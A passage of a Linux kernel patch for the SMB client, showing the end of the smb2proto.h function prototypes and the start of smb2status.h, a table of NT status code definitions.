++extern bool smb2_is_valid_oplock_break(char *buffer,
++				       struct TCP_Server_Info *srv);
++extern int smb3_handle_read_data(struct TCP_Server_Info *server,
++				 struct mid_q_entry *mid);
++extern int smb2_query_reparse_tag(const unsigned int xid, struct cifs_tcon *tcon,
++				struct cifs_sb_info *cifs_sb, const char *path,
++				__u32 *reparse_tag);
++int smb2_query_path_info(const unsigned int xid, struct cifs_tcon *tcon,
++			 struct cifs_sb_info *cifs_sb, const char *full_path,
++			 struct cifs_open_info_data *data, bool *adjust_tz, bool *reparse);
++extern int smb2_set_path_size(const unsigned int xid, struct cifs_tcon *tcon,
++			      const char *full_path, __u64 size,
++			      struct cifs_sb_info *cifs_sb, bool set_alloc);
++extern int smb2_set_file_info(struct inode *inode, const char *full_path,
++			      FILE_BASIC_INFO *buf, const unsigned int xid);
++extern int smb311_posix_mkdir(const unsigned int xid, struct inode *inode,
++			       umode_t mode, struct cifs_tcon *tcon,
++			       const char *full_path,
++			       struct cifs_sb_info *cifs_sb);
++extern int smb2_mkdir(const unsigned int xid, struct inode *inode,
++		      umode_t mode, struct cifs_tcon *tcon,
++		      const char *name, struct cifs_sb_info *cifs_sb);
++extern void smb2_mkdir_setinfo(struct inode *inode, const char *full_path,
++			       struct cifs_sb_info *cifs_sb,
++			       struct cifs_tcon *tcon, const unsigned int xid);
++extern int smb2_rmdir(const unsigned int xid, struct cifs_tcon *tcon,
++		      const char *name, struct cifs_sb_info *cifs_sb);
++extern int smb2_unlink(const unsigned int xid, struct cifs_tcon *tcon,
++		       const char *name, struct cifs_sb_info *cifs_sb);
++extern int smb2_rename_path(const unsigned int xid, struct cifs_tcon *tcon,
++			    const char *from_name, const char *to_name,
++			    struct cifs_sb_info *cifs_sb);
++extern int smb2_create_hardlink(const unsigned int xid, struct cifs_tcon *tcon,
++				const char *from_name, const char *to_name,
++				struct cifs_sb_info *cifs_sb);
++extern int smb3_create_mf_symlink(unsigned int xid, struct cifs_tcon *tcon,
++			struct cifs_sb_info *cifs_sb, const unsigned char *path,
++			char *pbuf, unsigned int *pbytes_written);
++extern int smb3_query_mf_symlink(unsigned int xid, struct cifs_tcon *tcon,
++			  struct cifs_sb_info *cifs_sb,
++			  const unsigned char *path, char *pbuf,
++			  unsigned int *pbytes_read);
++int smb2_parse_symlink_response(struct cifs_sb_info *cifs_sb, const struct kvec *iov, char **path);
++int smb2_open_file(const unsigned int xid, struct cifs_open_parms *oparms, __u32 *oplock,
++		   void *buf);
++extern int smb2_unlock_range(struct cifsFileInfo *cfile,
++			     struct file_lock *flock, const unsigned int xid);
++extern int smb2_push_mandatory_locks(struct cifsFileInfo *cfile);
++extern void smb2_reconnect_server(struct work_struct *work);
++extern int smb3_crypto_aead_allocate(struct TCP_Server_Info *server);
++extern unsigned long smb_rqst_len(struct TCP_Server_Info *server,
++				  struct smb_rqst *rqst);
++extern void smb2_set_next_command(struct cifs_tcon *tcon,
++				  struct smb_rqst *rqst);
++extern void smb2_set_related(struct smb_rqst *rqst);
++
++/*
++ * SMB2 Worker functions - most of protocol specific implementation details
++ * are contained within these calls.
++ */
++extern int SMB2_negotiate(const unsigned int xid,
++			  struct cifs_ses *ses,
++			  struct TCP_Server_Info *server);
++extern int SMB2_sess_setup(const unsigned int xid, struct cifs_ses *ses,
++			   struct TCP_Server_Info *server,
++			   const struct nls_table *nls_cp);
++extern int SMB2_logoff(const unsigned int xid, struct cifs_ses *ses);
++extern int SMB2_tcon(const unsigned int xid, struct cifs_ses *ses,
++		     const char *tree, struct cifs_tcon *tcon,
++		     const struct nls_table *);
++extern int SMB2_tdis(const unsigned int xid, struct cifs_tcon *tcon);
++extern int SMB2_open(const unsigned int xid, struct cifs_open_parms *oparms,
++		     __le16 *path, __u8 *oplock,
++		     struct smb2_file_all_info *buf,
++		     struct create_posix_rsp *posix,
++		     struct kvec *err_iov, int *resp_buftype);
++extern int SMB2_open_init(struct cifs_tcon *tcon,
++			  struct TCP_Server_Info *server,
++			  struct smb_rqst *rqst,
++			  __u8 *oplock, struct cifs_open_parms *oparms,
++			  __le16 *path);
++extern void SMB2_open_free(struct smb_rqst *rqst);
++extern int SMB2_ioctl(const unsigned int xid, struct cifs_tcon *tcon,
++		     u64 persistent_fid, u64 volatile_fid, u32 opcode,
++		     char *in_data, u32 indatalen, u32 maxoutlen,
++		     char **out_data, u32 *plen /* returned data len */);
++extern int SMB2_ioctl_init(struct cifs_tcon *tcon,
++			   struct TCP_Server_Info *server,
++			   struct smb_rqst *rqst,
++			   u64 persistent_fid, u64 volatile_fid, u32 opcode,
++			   char *in_data, u32 indatalen,
++			   __u32 max_response_size);
++extern void SMB2_ioctl_free(struct smb_rqst *rqst);
++extern int SMB2_change_notify(const unsigned int xid, struct cifs_tcon *tcon,
++			u64 persistent_fid, u64 volatile_fid, bool watch_tree,
++			u32 completion_filter, u32 max_out_data_len,
++			char **out_data, u32 *plen /* returned data len */);
++
++extern int __SMB2_close(const unsigned int xid, struct cifs_tcon *tcon,
++			u64 persistent_fid, u64 volatile_fid,
++			struct smb2_file_network_open_info *pbuf);
++extern int SMB2_close(const unsigned int xid, struct cifs_tcon *tcon,
++		      u64 persistent_file_id, u64 volatile_file_id);
++extern int SMB2_close_init(struct cifs_tcon *tcon,
++			   struct TCP_Server_Info *server,
++			   struct smb_rqst *rqst,
++			   u64 persistent_fid, u64 volatile_fid,
++			   bool query_attrs);
++extern void SMB2_close_free(struct smb_rqst *rqst);
++extern int SMB2_flush(const unsigned int xid, struct cifs_tcon *tcon,
++		      u64 persistent_file_id, u64 volatile_file_id);
++extern int SMB2_flush_init(const unsigned int xid, struct smb_rqst *rqst,
++			   struct cifs_tcon *tcon,
++			   struct TCP_Server_Info *server,
++			   u64 persistent_file_id, u64 volatile_file_id);
++extern void SMB2_flush_free(struct smb_rqst *rqst);
++extern int SMB311_posix_query_info(const unsigned int xid, struct cifs_tcon *tcon,
++		u64 persistent_fid, u64 volatile_fid, struct smb311_posix_qinfo *data, u32 *plen);
++extern int SMB2_query_info(const unsigned int xid, struct cifs_tcon *tcon,
++			   u64 persistent_file_id, u64 volatile_file_id,
++			   struct smb2_file_all_info *data);
++extern int SMB2_query_info_init(struct cifs_tcon *tcon,
++				struct TCP_Server_Info *server,
++				struct smb_rqst *rqst,
++				u64 persistent_fid, u64 volatile_fid,
++				u8 info_class, u8 info_type,
++				u32 additional_info, size_t output_len,
++				size_t input_len, void *input);
++extern void SMB2_query_info_free(struct smb_rqst *rqst);
++extern int SMB2_query_acl(const unsigned int xid, struct cifs_tcon *tcon,
++			  u64 persistent_file_id, u64 volatile_file_id,
++			  void **data, unsigned int *plen, u32 info);
++extern int SMB2_get_srv_num(const unsigned int xid, struct cifs_tcon *tcon,
++			    u64 persistent_fid, u64 volatile_fid,
++			    __le64 *uniqueid);
++extern int smb2_async_readv(struct cifs_readdata *rdata);
++extern int SMB2_read(const unsigned int xid, struct cifs_io_parms *io_parms,
++		     unsigned int *nbytes, char **buf, int *buf_type);
++extern int smb2_async_writev(struct cifs_writedata *wdata,
++			     void (*release)(struct kref *kref));
++extern int SMB2_write(const unsigned int xid, struct cifs_io_parms *io_parms,
++		      unsigned int *nbytes, struct kvec *iov, int n_vec);
++extern int SMB2_echo(struct TCP_Server_Info *server);
++extern int SMB2_query_directory(const unsigned int xid, struct cifs_tcon *tcon,
++				u64 persistent_fid, u64 volatile_fid, int index,
++				struct cifs_search_info *srch_inf);
++extern int SMB2_query_directory_init(unsigned int xid, struct cifs_tcon *tcon,
++				     struct TCP_Server_Info *server,
++				     struct smb_rqst *rqst,
++				     u64 persistent_fid, u64 volatile_fid,
++				     int index, int info_level);
++extern void SMB2_query_directory_free(struct smb_rqst *rqst);
++extern int SMB2_set_eof(const unsigned int xid, struct cifs_tcon *tcon,
++			u64 persistent_fid, u64 volatile_fid, u32 pid,
++			__le64 *eof);
++extern int SMB2_set_info_init(struct cifs_tcon *tcon,
++			      struct TCP_Server_Info *server,
++			      struct smb_rqst *rqst,
++			      u64 persistent_fid, u64 volatile_fid, u32 pid,
++			      u8 info_class, u8 info_type, u32 additional_info,
++			      void **data, unsigned int *size);
++extern void SMB2_set_info_free(struct smb_rqst *rqst);
++extern int SMB2_set_acl(const unsigned int xid, struct cifs_tcon *tcon,
++			u64 persistent_fid, u64 volatile_fid,
++			struct cifs_ntsd *pnntsd, int pacllen, int aclflag);
++extern int SMB2_set_ea(const unsigned int xid, struct cifs_tcon *tcon,
++		       u64 persistent_fid, u64 volatile_fid,
++		       struct smb2_file_full_ea_info *buf, int len);
++extern int SMB2_set_compression(const unsigned int xid, struct cifs_tcon *tcon,
++				u64 persistent_fid, u64 volatile_fid);
++extern int SMB2_oplock_break(const unsigned int xid, struct cifs_tcon *tcon,
++			     const u64 persistent_fid, const u64 volatile_fid,
++			     const __u8 oplock_level);
++extern int smb2_handle_cancelled_close(struct cifs_tcon *tcon,
++				       __u64 persistent_fid,
++				       __u64 volatile_fid);
++extern int smb2_handle_cancelled_mid(struct mid_q_entry *mid, struct TCP_Server_Info *server);
++void smb2_cancelled_close_fid(struct work_struct *work);
++extern int SMB2_QFS_info(const unsigned int xid, struct cifs_tcon *tcon,
++			 u64 persistent_file_id, u64 volatile_file_id,
++			 struct kstatfs *FSData);
++extern int SMB311_posix_qfs_info(const unsigned int xid, struct cifs_tcon *tcon,
++			 u64 persistent_file_id, u64 volatile_file_id,
++			 struct kstatfs *FSData);
++extern int SMB2_QFS_attr(const unsigned int xid, struct cifs_tcon *tcon,
++			 u64 persistent_file_id, u64 volatile_file_id, int lvl);
++extern int SMB2_lock(const unsigned int xid, struct cifs_tcon *tcon,
++		     const __u64 persist_fid, const __u64 volatile_fid,
++		     const __u32 pid, const __u64 length, const __u64 offset,
++		     const __u32 lockFlags, const bool wait);
++extern int smb2_lockv(const unsigned int xid, struct cifs_tcon *tcon,
++		      const __u64 persist_fid, const __u64 volatile_fid,
++		      const __u32 pid, const __u32 num_lock,
++		      struct smb2_lock_element *buf);
++extern int SMB2_lease_break(const unsigned int xid, struct cifs_tcon *tcon,
++			    __u8 *lease_key, const __le32 lease_state);
++extern int smb3_validate_negotiate(const unsigned int, struct cifs_tcon *);
++
++extern enum securityEnum smb2_select_sectype(struct TCP_Server_Info *,
++					enum securityEnum);
++extern void smb2_parse_contexts(struct TCP_Server_Info *server,
++				struct smb2_create_rsp *rsp,
++				unsigned int *epoch, char *lease_key,
++				__u8 *oplock, struct smb2_file_all_info *buf,
++				struct create_posix_rsp *posix);
++extern int smb3_encryption_required(const struct cifs_tcon *tcon);
++extern int smb2_validate_iov(unsigned int offset, unsigned int buffer_length,
++			     struct kvec *iov, unsigned int min_buf_size);
++extern int smb2_validate_and_copy_iov(unsigned int offset,
++				      unsigned int buffer_length,
++				      struct kvec *iov,
++				      unsigned int minbufsize, char *data);
++extern void smb2_copy_fs_info_to_kstatfs(
++	 struct smb2_fs_full_size_info *pfs_inf,
++	 struct kstatfs *kst);
++extern int smb311_crypto_shash_allocate(struct TCP_Server_Info *server);
++extern int smb311_update_preauth_hash(struct cifs_ses *ses,
++				      struct TCP_Server_Info *server,
++				      struct kvec *iov, int nvec);
++extern int smb2_query_info_compound(const unsigned int xid,
++				    struct cifs_tcon *tcon,
++				    const char *path, u32 desired_access,
++				    u32 class, u32 type, u32 output_len,
++				    struct kvec *rsp, int *buftype,
++				    struct cifs_sb_info *cifs_sb);
++/* query path info from the server using SMB311 POSIX extensions*/
++int smb311_posix_query_path_info(const unsigned int xid, struct cifs_tcon *tcon,
++				 struct cifs_sb_info *cifs_sb, const char *full_path,
++				 struct cifs_open_info_data *data, bool *adjust_tz, bool *reparse);
++int posix_info_parse(const void *beg, const void *end,
++		     struct smb2_posix_info_parsed *out);
++int posix_info_sid_size(const void *beg, const void *end);
++#endif			/* _SMB2PROTO_H */
+diff --git a/fs/smb/client/smb2status.h b/fs/smb/client/smb2status.h
+new file mode 100644
+index 0000000000000..a9e958166fc53
+--- /dev/null
++++ b/fs/smb/client/smb2status.h
+@@ -0,0 +1,1769 @@
++/* SPDX-License-Identifier: LGPL-2.1 */
++/*
++ *
++ *   SMB2 Status code (network error) definitions
++ *   Definitions are from MS-ERREF
++ *
++ *   Copyright (c) International Business Machines  Corp., 2009,2011
++ *   Author(s): Steve French (sfrench@us.ibm.com)
++ *
++ */
++
++/*
++ *  0 1 2 3 4 5 6 7 8 9 0 A B C D E F 0 1 2 3 4 5 6 7 8 9 A B C D E F
++ *  SEV C N <-------Facility--------> <------Error Status Code------>
++ *
++ *  C is set if "customer defined" error, N bit is reserved and MBZ
++ */
++
++#define STATUS_SEVERITY_SUCCESS __constant_cpu_to_le32(0x0000)
++#define STATUS_SEVERITY_INFORMATIONAL cpu_to_le32(0x0001)
++#define STATUS_SEVERITY_WARNING cpu_to_le32(0x0002)
++#define STATUS_SEVERITY_ERROR cpu_to_le32(0x0003)
++
++struct ntstatus {
++	/* Facility is the high 12 bits of the following field */
++	__le32 Facility; /* low 2 bits Severity, next is Customer, then rsrvd */
++	__le32 Code;
++};
++
++#define STATUS_SUCCESS cpu_to_le32(0x00000000)
++#define STATUS_WAIT_0 cpu_to_le32(0x00000000)
++#define STATUS_WAIT_1 cpu_to_le32(0x00000001)
++#define STATUS_WAIT_2 cpu_to_le32(0x00000002)
++#define STATUS_WAIT_3 cpu_to_le32(0x00000003)
++#define STATUS_WAIT_63 cpu_to_le32(0x0000003F)
++#define STATUS_ABANDONED cpu_to_le32(0x00000080)
++#define STATUS_ABANDONED_WAIT_0 cpu_to_le32(0x00000080)
++#define STATUS_ABANDONED_WAIT_63 cpu_to_le32(0x000000BF)
++#define STATUS_USER_APC cpu_to_le32(0x000000C0)
++#define STATUS_KERNEL_APC cpu_to_le32(0x00000100)
++#define STATUS_ALERTED cpu_to_le32(0x00000101)
++#define STATUS_TIMEOUT cpu_to_le32(0x00000102)
++#define STATUS_PENDING cpu_to_le32(0x00000103)
++#define STATUS_REPARSE cpu_to_le32(0x00000104)
++#define STATUS_MORE_ENTRIES cpu_to_le32(0x00000105)
++#define STATUS_NOT_ALL_ASSIGNED cpu_to_le32(0x00000106)
++#define STATUS_SOME_NOT_MAPPED cpu_to_le32(0x00000107)
++#define STATUS_OPLOCK_BREAK_IN_PROGRESS cpu_to_le32(0x00000108)
++#define STATUS_VOLUME_MOUNTED cpu_to_le32(0x00000109)
++#define STATUS_RXACT_COMMITTED cpu_to_le32(0x0000010A)
++#define STATUS_NOTIFY_CLEANUP cpu_to_le32(0x0000010B)
++#define STATUS_NOTIFY_ENUM_DIR cpu_to_le32(0x0000010C)
++#define STATUS_NO_QUOTAS_FOR_ACCOUNT cpu_to_le32(0x0000010D)
++#define STATUS_PRIMARY_TRANSPORT_CONNECT_FAILED cpu_to_le32(0x0000010E)
++#define STATUS_PAGE_FAULT_TRANSITION cpu_to_le32(0x00000110)
++#define STATUS_PAGE_FAULT_DEMAND_ZERO cpu_to_le32(0x00000111)
++#define STATUS_PAGE_FAULT_COPY_ON_WRITE cpu_to_le32(0x00000112)
++#define STATUS_PAGE_FAULT_GUARD_PAGE cpu_to_le32(0x00000113)
++#define STATUS_PAGE_FAULT_PAGING_FILE cpu_to_le32(0x00000114)
++#define STATUS_CACHE_PAGE_LOCKED cpu_to_le32(0x00000115)
++#define STATUS_CRASH_DUMP cpu_to_le32(0x00000116)
++#define STATUS_BUFFER_ALL_ZEROS cpu_to_le32(0x00000117)
++#define STATUS_REPARSE_OBJECT cpu_to_le32(0x00000118)
++#define STATUS_RESOURCE_REQUIREMENTS_CHANGED cpu_to_le32(0x00000119)
++#define STATUS_TRANSLATION_COMPLETE cpu_to_le32(0x00000120)
++#define STATUS_DS_MEMBERSHIP_EVALUATED_LOCALLY cpu_to_le32(0x00000121)
++#define STATUS_NOTHING_TO_TERMINATE cpu_to_le32(0x00000122)
++#define STATUS_PROCESS_NOT_IN_JOB cpu_to_le32(0x00000123)
++#define STATUS_PROCESS_IN_JOB cpu_to_le32(0x00000124)
++#define STATUS_VOLSNAP_HIBERNATE_READY cpu_to_le32(0x00000125)
++#define STATUS_FSFILTER_OP_COMPLETED_SUCCESSFULLY cpu_to_le32(0x00000126)
++#define STATUS_INTERRUPT_VECTOR_ALREADY_CONNECTED cpu_to_le32(0x00000127)
++#define STATUS_INTERRUPT_STILL_CONNECTED cpu_to_le32(0x00000128)
++#define STATUS_PROCESS_CLONED cpu_to_le32(0x00000129)
++#define STATUS_FILE_LOCKED_WITH_ONLY_READERS cpu_to_le32(0x0000012A)
++#define STATUS_FILE_LOCKED_WITH_WRITERS cpu_to_le32(0x0000012B)
++#define STATUS_RESOURCEMANAGER_READ_ONLY cpu_to_le32(0x00000202)
++#define STATUS_WAIT_FOR_OPLOCK cpu_to_le32(0x00000367)
++#define DBG_EXCEPTION_HANDLED cpu_to_le32(0x00010001)
++#define DBG_CONTINUE cpu_to_le32(0x00010002)
++#define STATUS_FLT_IO_COMPLETE cpu_to_le32(0x001C0001)
++#define STATUS_OBJECT_NAME_EXISTS cpu_to_le32(0x40000000)
++#define STATUS_THREAD_WAS_SUSPENDED cpu_to_le32(0x40000001)
++#define STATUS_WORKING_SET_LIMIT_RANGE cpu_to_le32(0x40000002)
++#define STATUS_IMAGE_NOT_AT_BASE cpu_to_le32(0x40000003)
++#define STATUS_RXACT_STATE_CREATED cpu_to_le32(0x40000004)
++#define STATUS_SEGMENT_NOTIFICATION cpu_to_le32(0x40000005)
++#define STATUS_LOCAL_USER_SESSION_KEY cpu_to_le32(0x40000006)
++#define STATUS_BAD_CURRENT_DIRECTORY cpu_to_le32(0x40000007)
++#define STATUS_SERIAL_MORE_WRITES cpu_to_le32(0x40000008)
++#define STATUS_REGISTRY_RECOVERED cpu_to_le32(0x40000009)
++#define STATUS_FT_READ_RECOVERY_FROM_BACKUP cpu_to_le32(0x4000000A)
++#define STATUS_FT_WRITE_RECOVERY cpu_to_le32(0x4000000B)
++#define STATUS_SERIAL_COUNTER_TIMEOUT cpu_to_le32(0x4000000C)
++#define STATUS_NULL_LM_PASSWORD cpu_to_le32(0x4000000D)
++#define STATUS_IMAGE_MACHINE_TYPE_MISMATCH cpu_to_le32(0x4000000E)
++#define STATUS_RECEIVE_PARTIAL cpu_to_le32(0x4000000F)
++#define STATUS_RECEIVE_EXPEDITED cpu_to_le32(0x40000010)
++#define STATUS_RECEIVE_PARTIAL_EXPEDITED cpu_to_le32(0x40000011)
++#define STATUS_EVENT_DONE cpu_to_le32(0x40000012)
++#define STATUS_EVENT_PENDING cpu_to_le32(0x40000013)
++#define STATUS_CHECKING_FILE_SYSTEM cpu_to_le32(0x40000014)
++#define STATUS_FATAL_APP_EXIT cpu_to_le32(0x40000015)
++#define STATUS_PREDEFINED_HANDLE cpu_to_le32(0x40000016)
++#define STATUS_WAS_UNLOCKED cpu_to_le32(0x40000017)
++#define STATUS_SERVICE_NOTIFICATION cpu_to_le32(0x40000018)
++#define STATUS_WAS_LOCKED cpu_to_le32(0x40000019)
++#define STATUS_LOG_HARD_ERROR cpu_to_le32(0x4000001A)
++#define STATUS_ALREADY_WIN32 cpu_to_le32(0x4000001B)
++#define STATUS_WX86_UNSIMULATE cpu_to_le32(0x4000001C)
++#define STATUS_WX86_CONTINUE cpu_to_le32(0x4000001D)
++#define STATUS_WX86_SINGLE_STEP cpu_to_le32(0x4000001E)
++#define STATUS_WX86_BREAKPOINT cpu_to_le32(0x4000001F)
++#define STATUS_WX86_EXCEPTION_CONTINUE cpu_to_le32(0x40000020)
++#define STATUS_WX86_EXCEPTION_LASTCHANCE cpu_to_le32(0x40000021)
++#define STATUS_WX86_EXCEPTION_CHAIN cpu_to_le32(0x40000022)
++#define STATUS_IMAGE_MACHINE_TYPE_MISMATCH_EXE cpu_to_le32(0x40000023)
++#define STATUS_NO_YIELD_PERFORMED cpu_to_le32(0x40000024)
++#define STATUS_TIMER_RESUME_IGNORED cpu_to_le32(0x40000025)
++#define STATUS_ARBITRATION_UNHANDLED cpu_to_le32(0x40000026)
++#define STATUS_CARDBUS_NOT_SUPPORTED cpu_to_le32(0x40000027)
++#define STATUS_WX86_CREATEWX86TIB cpu_to_le32(0x40000028)
++#define STATUS_MP_PROCESSOR_MISMATCH cpu_to_le32(0x40000029)
++#define STATUS_HIBERNATED cpu_to_le32(0x4000002A)
++#define STATUS_RESUME_HIBERNATION cpu_to_le32(0x4000002B)
++#define STATUS_FIRMWARE_UPDATED cpu_to_le32(0x4000002C)
++#define STATUS_DRIVERS_LEAKING_LOCKED_PAGES cpu_to_le32(0x4000002D)
++#define STATUS_MESSAGE_RETRIEVED cpu_to_le32(0x4000002E)
++#define STATUS_SYSTEM_POWERSTATE_TRANSITION cpu_to_le32(0x4000002F)
++#define STATUS_ALPC_CHECK_COMPLETION_LIST cpu_to_le32(0x40000030)
++#define STATUS_SYSTEM_POWERSTATE_COMPLEX_TRANSITION cpu_to_le32(0x40000031)
++#define STATUS_ACCESS_AUDIT_BY_POLICY cpu_to_le32(0x40000032)
++#define STATUS_ABANDON_HIBERFILE cpu_to_le32(0x40000033)
++#define STATUS_BIZRULES_NOT_ENABLED cpu_to_le32(0x40000034)
++#define STATUS_WAKE_SYSTEM cpu_to_le32(0x40000294)
++#define STATUS_DS_SHUTTING_DOWN cpu_to_le32(0x40000370)
++#define DBG_REPLY_LATER cpu_to_le32(0x40010001)
++#define DBG_UNABLE_TO_PROVIDE_HANDLE cpu_to_le32(0x40010002)
++#define DBG_TERMINATE_THREAD cpu_to_le32(0x40010003)
++#define DBG_TERMINATE_PROCESS cpu_to_le32(0x40010004)
++#define DBG_CONTROL_C cpu_to_le32(0x40010005)
++#define DBG_PRINTEXCEPTION_C cpu_to_le32(0x40010006)
++#define DBG_RIPEXCEPTION cpu_to_le32(0x40010007)
++#define DBG_CONTROL_BREAK cpu_to_le32(0x40010008)
++#define DBG_COMMAND_EXCEPTION cpu_to_le32(0x40010009)
++#define RPC_NT_UUID_LOCAL_ONLY cpu_to_le32(0x40020056)
++#define RPC_NT_SEND_INCOMPLETE cpu_to_le32(0x400200AF)
++#define STATUS_CTX_CDM_CONNECT cpu_to_le32(0x400A0004)
++#define STATUS_CTX_CDM_DISCONNECT cpu_to_le32(0x400A0005)
++#define STATUS_SXS_RELEASE_ACTIVATION_CONTEXT cpu_to_le32(0x4015000D)
++#define STATUS_RECOVERY_NOT_NEEDED cpu_to_le32(0x40190034)
++#define STATUS_RM_ALREADY_STARTED cpu_to_le32(0x40190035)
++#define STATUS_LOG_NO_RESTART cpu_to_le32(0x401A000C)
++#define STATUS_VIDEO_DRIVER_DEBUG_REPORT_REQUEST cpu_to_le32(0x401B00EC)
++#define STATUS_GRAPHICS_PARTIAL_DATA_POPULATED cpu_to_le32(0x401E000A)
++#define STATUS_GRAPHICS_DRIVER_MISMATCH cpu_to_le32(0x401E0117)
++#define STATUS_GRAPHICS_MODE_NOT_PINNED cpu_to_le32(0x401E0307)
++#define STATUS_GRAPHICS_NO_PREFERRED_MODE cpu_to_le32(0x401E031E)
++#define STATUS_GRAPHICS_DATASET_IS_EMPTY cpu_to_le32(0x401E034B)
++#define STATUS_GRAPHICS_NO_MORE_ELEMENTS_IN_DATASET cpu_to_le32(0x401E034C)
++#define STATUS_GRAPHICS_PATH_CONTENT_GEOMETRY_TRANSFORMATION_NOT_PINNED cpu_to_le32(0x401E0351)
++#define STATUS_GRAPHICS_UNKNOWN_CHILD_STATUS cpu_to_le32(0x401E042F)
++#define STATUS_GRAPHICS_LEADLINK_START_DEFERRED cpu_to_le32(0x401E0437)
++#define STATUS_GRAPHICS_POLLING_TOO_FREQUENTLY cpu_to_le32(0x401E0439)
++#define STATUS_GRAPHICS_START_DEFERRED cpu_to_le32(0x401E043A)
++#define STATUS_NDIS_INDICATION_REQUIRED cpu_to_le32(0x40230001)
++#define STATUS_GUARD_PAGE_VIOLATION cpu_to_le32(0x80000001)
++#define STATUS_DATATYPE_MISALIGNMENT cpu_to_le32(0x80000002)
++#define STATUS_BREAKPOINT cpu_to_le32(0x80000003)
++#define STATUS_SINGLE_STEP cpu_to_le32(0x80000004)
++#define STATUS_BUFFER_OVERFLOW cpu_to_le32(0x80000005)
++#define STATUS_NO_MORE_FILES cpu_to_le32(0x80000006)
++#define STATUS_WAKE_SYSTEM_DEBUGGER cpu_to_le32(0x80000007)
++#define STATUS_HANDLES_CLOSED cpu_to_le32(0x8000000A)
++#define STATUS_NO_INHERITANCE cpu_to_le32(0x8000000B)
++#define STATUS_GUID_SUBSTITUTION_MADE cpu_to_le32(0x8000000C)
++#define STATUS_PARTIAL_COPY cpu_to_le32(0x8000000D)
++#define STATUS_DEVICE_PAPER_EMPTY cpu_to_le32(0x8000000E)
++#define STATUS_DEVICE_POWERED_OFF cpu_to_le32(0x8000000F)
++#define STATUS_DEVICE_OFF_LINE cpu_to_le32(0x80000010)
++#define STATUS_DEVICE_BUSY cpu_to_le32(0x80000011)
++#define STATUS_NO_MORE_EAS cpu_to_le32(0x80000012)
++#define STATUS_INVALID_EA_NAME cpu_to_le32(0x80000013)
++#define STATUS_EA_LIST_INCONSISTENT cpu_to_le32(0x80000014)
++#define STATUS_INVALID_EA_FLAG cpu_to_le32(0x80000015)
++#define STATUS_VERIFY_REQUIRED cpu_to_le32(0x80000016)
++#define STATUS_EXTRANEOUS_INFORMATION cpu_to_le32(0x80000017)
++#define STATUS_RXACT_COMMIT_NECESSARY cpu_to_le32(0x80000018)
++#define STATUS_NO_MORE_ENTRIES cpu_to_le32(0x8000001A)
++#define STATUS_FILEMARK_DETECTED cpu_to_le32(0x8000001B)
++#define STATUS_MEDIA_CHANGED cpu_to_le32(0x8000001C)
++#define STATUS_BUS_RESET cpu_to_le32(0x8000001D)
++#define STATUS_END_OF_MEDIA cpu_to_le32(0x8000001E)
++#define STATUS_BEGINNING_OF_MEDIA cpu_to_le32(0x8000001F)
++#define STATUS_MEDIA_CHECK cpu_to_le32(0x80000020)
++#define STATUS_SETMARK_DETECTED cpu_to_le32(0x80000021)
++#define STATUS_NO_DATA_DETECTED cpu_to_le32(0x80000022)
++#define STATUS_REDIRECTOR_HAS_OPEN_HANDLES cpu_to_le32(0x80000023)
++#define STATUS_SERVER_HAS_OPEN_HANDLES cpu_to_le32(0x80000024)
++#define STATUS_ALREADY_DISCONNECTED cpu_to_le32(0x80000025)
++#define STATUS_LONGJUMP cpu_to_le32(0x80000026)
++#define STATUS_CLEANER_CARTRIDGE_INSTALLED cpu_to_le32(0x80000027)
++#define STATUS_PLUGPLAY_QUERY_VETOED cpu_to_le32(0x80000028)
++#define STATUS_UNWIND_CONSOLIDATE cpu_to_le32(0x80000029)
++#define STATUS_REGISTRY_HIVE_RECOVERED cpu_to_le32(0x8000002A)
++#define STATUS_DLL_MIGHT_BE_INSECURE cpu_to_le32(0x8000002B)
++#define STATUS_DLL_MIGHT_BE_INCOMPATIBLE cpu_to_le32(0x8000002C)
++#define STATUS_STOPPED_ON_SYMLINK cpu_to_le32(0x8000002D)
++#define STATUS_DEVICE_REQUIRES_CLEANING cpu_to_le32(0x80000288)
++#define STATUS_DEVICE_DOOR_OPEN cpu_to_le32(0x80000289)
++#define STATUS_DATA_LOST_REPAIR cpu_to_le32(0x80000803)
++#define DBG_EXCEPTION_NOT_HANDLED cpu_to_le32(0x80010001)
++#define STATUS_CLUSTER_NODE_ALREADY_UP cpu_to_le32(0x80130001)
++#define STATUS_CLUSTER_NODE_ALREADY_DOWN cpu_to_le32(0x80130002)
++#define STATUS_CLUSTER_NETWORK_ALREADY_ONLINE cpu_to_le32(0x80130003)
++#define STATUS_CLUSTER_NETWORK_ALREADY_OFFLINE cpu_to_le32(0x80130004)
++#define STATUS_CLUSTER_NODE_ALREADY_MEMBER cpu_to_le32(0x80130005)
++#define STATUS_COULD_NOT_RESIZE_LOG cpu_to_le32(0x80190009)
++#define STATUS_NO_TXF_METADATA cpu_to_le32(0x80190029)
++#define STATUS_CANT_RECOVER_WITH_HANDLE_OPEN cpu_to_le32(0x80190031)
++#define STATUS_TXF_METADATA_ALREADY_PRESENT cpu_to_le32(0x80190041)
++#define STATUS_TRANSACTION_SCOPE_CALLBACKS_NOT_SET cpu_to_le32(0x80190042)
++#define STATUS_VIDEO_HUNG_DISPLAY_DRIVER_THREAD_RECOVERED cpu_to_le32(0x801B00EB)
++#define STATUS_FLT_BUFFER_TOO_SMALL cpu_to_le32(0x801C0001)
++#define STATUS_FVE_PARTIAL_METADATA cpu_to_le32(0x80210001)
++#define STATUS_UNSUCCESSFUL cpu_to_le32(0xC0000001)
++#define STATUS_NOT_IMPLEMENTED cpu_to_le32(0xC0000002)
++#define STATUS_INVALID_INFO_CLASS cpu_to_le32(0xC0000003)
++#define STATUS_INFO_LENGTH_MISMATCH cpu_to_le32(0xC0000004)
++#define STATUS_ACCESS_VIOLATION cpu_to_le32(0xC0000005)
++#define STATUS_IN_PAGE_ERROR cpu_to_le32(0xC0000006)
++#define STATUS_PAGEFILE_QUOTA cpu_to_le32(0xC0000007)
++#define STATUS_INVALID_HANDLE cpu_to_le32(0xC0000008)
++#define STATUS_BAD_INITIAL_STACK cpu_to_le32(0xC0000009)
++#define STATUS_BAD_INITIAL_PC cpu_to_le32(0xC000000A)
++#define STATUS_INVALID_CID cpu_to_le32(0xC000000B)
++#define STATUS_TIMER_NOT_CANCELED cpu_to_le32(0xC000000C)
++#define STATUS_INVALID_PARAMETER cpu_to_le32(0xC000000D)
++#define STATUS_NO_SUCH_DEVICE cpu_to_le32(0xC000000E)
++#define STATUS_NO_SUCH_FILE cpu_to_le32(0xC000000F)
++#define STATUS_INVALID_DEVICE_REQUEST cpu_to_le32(0xC0000010)
++#define STATUS_END_OF_FILE cpu_to_le32(0xC0000011)
